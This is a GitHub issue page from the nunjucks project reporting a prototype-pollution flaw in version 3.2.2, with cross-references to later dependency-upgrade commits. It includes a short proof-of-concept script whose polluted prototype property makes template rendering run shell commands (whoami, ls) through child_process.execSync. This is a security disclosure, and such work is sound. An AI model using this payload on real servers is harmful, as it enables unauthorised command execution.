Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security bug about prototype pollution #1331

Closed
ChenKS12138 opened this issue Nov 25, 2020 · 0 comments · Fixed by #1330, AppBox-project/server#54 or pixiebrix/pixiebrix-extension#292 · May be fixed by WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition#190 or WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition#206
Closed

Security bug about prototype pollution #1331

ChenKS12138 opened this issue Nov 25, 2020 · 0 comments · Fixed by #1330, AppBox-project/server#54 or pixiebrix/pixiebrix-extension#292 · May be fixed by WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition#190 or WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition#206

Comments

@ChenKS12138
Copy link
Contributor

This is a security bug. The current version of nunjucks can be attacked by prototype pollution.
What I expected isthis is payload2 content is function(){ return global.process.mainModule.require('child_process').execSync('ls') }() , but the function returns this is payload2 content is main.js node_modules package.json yarn.lock.

Closes #1330 .

Environment

Mac os 10.15.7
Nodejs 12.18.1
nunjucks 3.2.2

The sample code is as follows.

const nunjucks = require("nunjucks");

nunjucks.configure({
  autoescape: true,
});

const template = nunjucks.compile(" content is {{ content }} ");

const payload = { };

payload.__proto__.content =
  " function(){ return global.process.mainModule.require('child_process').execSync('whoami') }() ";

console.log("this is payload2 ", template.render(payload));

image
@ChenKS12138 ChenKS12138 mentioned this issue Nov 25, 2020
Merged
4 tasks
This was referenced Mar 11, 2021
Merged
Merged
striezel added a commit to striezel-stash/rustsec-audit-check that referenced this issue Mar 13, 2023
@striezel
chore(deps): update nunjucks to 3.2.3
5b34e13 
Fixes a prototype pollution in nunjucks. See
<mozilla/nunjucks#1331> for more
information.
striezel added a commit to striezel-stash/rustsec-audit-check that referenced this issue Mar 13, 2023
@striezel
chore(deps): update nunjucks to 3.2.3
d6dc202 
Fixes a prototype pollution in nunjucks. See
<mozilla/nunjucks#1331> for more
information.
This was referenced Jul 16, 2024
Open
Open
Open
@WontonSam WontonSam mentioned this issue Aug 1, 2024
Open
@AliceSof AliceSof mentioned this issue Aug 6, 2024
Open
@BitcoinOutput BitcoinOutput mentioned this issue Sep 12, 2024
Open
@Roseymr Roseymr mentioned this issue Sep 17, 2024
Open
@GodsonLeigh GodsonLeigh mentioned this issue Sep 19, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix security bug about prototype pollution ChenKS12138/nunjucks
Bump nunjucks from 3.2.2 to 3.2.3 AppBox-project/server
Bump nunjucks from 3.2.2 to 3.2.3 pixiebrix/pixiebrix-extension
[Snyk] Upgrade nunjucks from 3.2.1 to 3.2.4 WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition
[Snyk] Upgrade nunjucks from 3.2.1 to 3.2.4 WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition
[Snyk] Upgrade nunjucks from 3.2.1 to 3.2.4 WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition
[Snyk] Upgrade nunjucks from 3.2.1 to 3.2.4 WontonSam/cachimanexpress.js-Design-Patterns-Third-Edition
[Snyk] Upgrade nunjucks from 3.2.3 to 3.2.4 AliceSof/bsc-genesis-contract
[Snyk] Upgrade: lodash, elliptic, rlp, ethereum-input-data-decoder, mem, minimist, nunjucks, openzeppelin-solidity, solidity-bytes-utils, truffle-flattener, web3 BitcoinOutput/bsc-genesis-contractin
[Snyk] Upgrade: nunjucks, openzeppelin-solidity, web3 Roseymr/bsc-genesis-contract
1 participant
@ChenKS12138